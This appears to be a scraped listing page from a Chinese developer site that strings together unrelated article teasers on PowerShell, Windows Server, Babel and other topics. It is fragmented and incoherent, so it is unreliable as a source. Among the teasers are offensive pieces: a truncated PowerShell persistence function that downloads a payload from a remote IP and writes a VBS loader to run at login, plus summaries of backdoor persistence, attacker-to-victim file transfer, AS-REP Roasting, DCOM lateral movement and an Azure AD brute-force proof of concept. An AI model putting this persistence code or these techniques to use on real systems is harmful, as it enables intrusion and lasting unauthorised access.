在Windows Server日志配置收集工具的场景2里,有几个模块特别显眼,那就是带着Hard开头的:
继上一篇,上一篇重点介绍了腾讯云Windows Server日志收集工具的“场景”功能,那么场景功能究竟是以什么标准来分级的呢?
看下https://til.secretgeek.net/powershell/out-file-encoding.html
netsh interface portproxy add v4tov4 listenport=22 listenaddress=172.27.49.143 connectaddress=192.168.56.2 connectport=22
powershell 重定向输出字符串到.bat 、.cmd、 .vbs等文本性质的可执行文件时,一定要注意编码
背景是这样,我在powershell中想重定向生成一个ANSI编码的文件,试了多种编码方式都做不到,比如
重開 Windows PowerShell 並安裝 Oh My Posh 所需的字型
首先,创建一个server 对象实例,然后连接它。我只需要引入Script() 方法,脚本如下:
由于浏览器的版本和兼容性问题,很多es6,es7的新的方法都不能使用,等到可以使用的时候,可能已经过去了很多年。Babel可以把es6,es7的新代码编译成兼容绝大多数的主流浏览器的代码。 本篇文章主要介绍在项目中如何安装配置和使用babel. 1.在项目下初始化 package.json $ npm init 2.在项目中安装babel $ npm install babel-cli --save-dev 3.安装babel插件 $ npm install babel-preset-xxxxxx --sa
PS C:\>get-process | convertto-html -property Name, Path, Company -title "Process Information" > proc.htm; ii proc. htm
为了进行相关安全方面的认证,需要对公司域环境内员工账号的密码进行审计,作为一名刚从事信息安全的人员,尝试在本身拥有的权限以内,在不影响其他员工日常工作、不影响服务器正常运行的情况下,审计出使用弱密码作为登录口令的员工。
最近在培训PowerShell,在讲到Pipeline的时候,对于我这种长期和数据(数据库)打交道的人来说,觉得很实用,所以写此博文,记录一下。
文档:https://cloud.tencent.com/developer/article/2285114
Opportunities to find our deeper powers come when life seems most challenging.
“今天,我将介绍关于hacker拿到一台服务器之后,如何建立持久性的后门的一些非常实用的小技巧!”
server系统本来默认就是开启密码复杂度,但PC系统默认是关闭的,这就被我发现坑了,如果你在云上使用win7、win10等,一定要开启密码复杂度。
在这篇文章中,我们将深入探讨文件传输的艺术。我们将介绍如何将文件从攻击者计算机传输到受害者 Windows 10 主机(下载),以及如何从受害者 Windows 10 主机传输回攻击者计算机(上传)的各种技术。
回顾上篇,解释了场景“2”中的四个标签,也介绍了对应着Windows Server中的四个功能在日常运维中究竟起到什么作用以及如何去驾驭他们。
最近编写工具站(Laravel + Vue.js【是引用.js文件,不是前端vue.js后端laravel】)的时候,写js的时候,是在不想写es5语法,比如写var,Webstorm提醒使用let或者const,本人是强迫症,不想有个波浪线提示。
AS-REP Roasting是一种对用户账号进行离线爆破的攻击方式。但是该攻击方式利用比较局限,因为其需要用户账号设置 "Do not require Kerberos preauthentication(不需要kerberos预身份验证) " 。而该属性默认是没有勾选上的。
答:使用babel模块,babel是一个使用非常广泛的es6转换器,这就意味着我们可以将es6代码转为es5代码,从而在老版本的浏览器中执行。 使用步骤:
Source Map,就是能让我们在线上调试时看到原始代码的一种技术,它实际是一个是个映射文件,它提供了【压缩合并后代码】到【原始代码】间的行列转换关系。
由于权限的设置,当文件被签出时导致别人不可见了,这对校验文件个数的人来说着实是件烦恼的事。幸好利用PowerShell,可以获取Site Collection下被签出的文件。 Resolution Add-PSSnapin Microsoft.SharePoint.PowerShell function GetAllCheckOutFiles([string]$siteUrl){ $spSite=Get-SPSite $siteUrl $spSite.AllWebs|%
『我们测试文件上传时需要上传指定大小的文件,Windows 如何创建指定大小的文件,有比较便捷的操作方法吗 ?』
最近做了一次XenDesktop的整体升级,期间考虑到原有架构的不稳定性,采取了新建XD Site方式,将原有桌面全部迁移到新Site后,原有配置的诸多XD策略也需要迁移过来,经过查询,Citrix 提供了相应的PowerShell命令来方便管理员的迁移。
输入目录的绝对路径 空格 .dll,然后按路径排序,然后按住shift选择system32根目录的文件,右击点复制完整路径和文件名,粘贴到记事本文件里即可
Write-Debug 示例 (建议实用的方法:$host.UI.WriteDebugLine())
Tips : 非常注意Replace中得[Regex]类里面有个Escape静态方法非常方便我们进行禁用正则解析。
#> #使用Unicorn生成已编码的powershell命令。修改注册表,当用户登录时执行payload function Add-Persistence() { #payload的路径 $payloadurl = "http://192.168.125.106:8000/ghu98hjbs7jhj2" #保存维权马的路径 $tmpdir = $env:APPDATA; #vbs路径 $payloadvbsloaderpath = "$tmpdir\_log.vbs" #下载payloa
制作sysprep镜像的步骤主要就2步:下载自动应答文件 → 执行sysprep命令
最近在测试英特尔的傲腾可持久化内存,使用到了memtier_benchmark这个工具,在使用这个工具的时候,遇到了一些问题,我简单总结了一下,写在这里,后续如果有测试需求,可以参考下。
UserData依赖cloudbase-init,cloudbase-init依赖光驱,请不要禁用cloudbase-init服务或改动它、不要禁用光驱,不要删除光驱盘符,如果有安全软件,可能会拦截cloudbase-init,因为cloudbase-init通过python起作用,安全软件可能会认为这是风险项,因此有必要在安全软件里进行cloudbase-init的信任。
这篇文章主要讨论的是DCOM横向渗透以及Payload执行方法,当目标系统的\target\admin$\system32\中不包含mobsync.exe时,本文所介绍的方法才可行。如果你能获取到目标系统的管理员权限(通过PowerShell),你将能做到如下所示的东西:
babel 6与之前版本的区别: 之前版本只要安装一个babel就可以用了,所以之前的版本包含了一大堆的东西,这也导致了下载一堆不必要的东西。但在babel6中,将babel拆分成两个包: babel-cli和babel-core。如果你想要在CLI(终端或REPL)使用babel就下载babel-cli,如果想要在node中使用就下载babel-core。 babel 6已结尽可能的模块化了,如果还用babel 6之前的方法转换ES6,它会原样输出,并不会转化,因为需要安装插件。
Babel是一个 ES6 转码器,能将 ES6 代码转为 ES5 代码,这样原本不支持ES6的老版本浏览器执行ES6代码
使用任务#2中的Cmdlet和Select-object,仅显示是星期几,示例如下:
描述:.Net类型中的方法功能很强大。可以通过类型的构造函数创建新的对象,也可以将已存在的对象转换成指定的类型。 通过New-Object创建新对象,使用构造函数创建一个指定类型的实例对象,该类型必须至少包含一个签名相匹配的构造函数;
PEB结构中ProcessParameters是命令行参数,通过在内存中获取到ProcessParameters的地址,进行覆盖,替换参数。peb结构:https://docs.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-peb
虽然已经测试过多种Windows系统能用,但不能保证适用各种情况,毕竟系统环境千差万别,建议先打快照,快照转镜像买台按量计费的临时测试机的机器来验证,验证没问题再用
且听笔者一句劝,无论是Windows还是Linux抑或是Unix都是大部分理论是相同的,与其与人争吵对比这几个平台之类的差异,不如好好研究下底层的各个子系统。
SecureWorks 最近的 Azure Active Directory 密码暴力破解漏洞的 POC
UserData产品文档:https://cloud.tencent.com/document/product/213/17526
虽然ES6非常好用,但并不是所有浏览器所有客户端都适应ES6的,降成ES5是为了更强的使用性。我一直不关注这个东西,直到有人和我说,你做的东西很好,但是对不起,我82年的浏览器显示不出来
在安装Babel之前,需使用npm init先初始化我们的项目。通过cmd打开命令行工具,进入项目目录,输入下边的命令:
env : process.env.BABEL_ENV or process.env.NODE_env
msys2是一种在Windows平台上模拟Linux运行环境的技术,它的一个优点就在于利用pacman包管理器,我们可以比较轻松的使用Linux包管理器的方式来安装一整套可以在Windows上运行的Linux工具。如果你只是想要在Windows上简单运行一些Linux程序,那么msys2是一个很好的选择。
设置开机计划任务1分钟校时的原因是开机后第1次校时有时候要等若干分钟,校时成功后才会走公共镜像默认的ntp 5分钟校时,设置开机计划任务就是为了让开机后快速校时,不用等若干分钟(等若干分钟的原因见微软官网文档https://docs.microsoft.com/en-us/troubleshoot/windows-client/identity/w32time-not-start-on-workgroup )
1.容灾备份恢复必备条件 MySQL 数据库开启了log-bin参数记录binlog日志功能,且主库于备份的从库都要开启binlo功能。
你是否需要连接数据库?这里有一段代码演示如何查询和获取SQL数据,只需非常简单正确的配置你的账户信息、服务器地址及SQL语句就行:
关于ZenBuster ZenBuster是一款功能强大的多线程跨平台URL枚举工具,该工具基于Python开发,同时还具备暴力破解功能。 该工具适用于安全专业人员,可以在渗透测试或CTF比赛中为广大研究人员提供帮助,并收集和目标相关的各种信息。 工具功能 1、该工具能够对子域名和URI资源(目录/文件)进行爆破和枚举; 2、需要使用适当的字典文件; 3、主机名格式支持标准格式、IPv4和IPv6; 4、支持将结果记录到文件中(-o [filename]); 5、使用-p选项为非标准Web服务器指定
领取专属 10元无门槛券
手把手带您无忧上云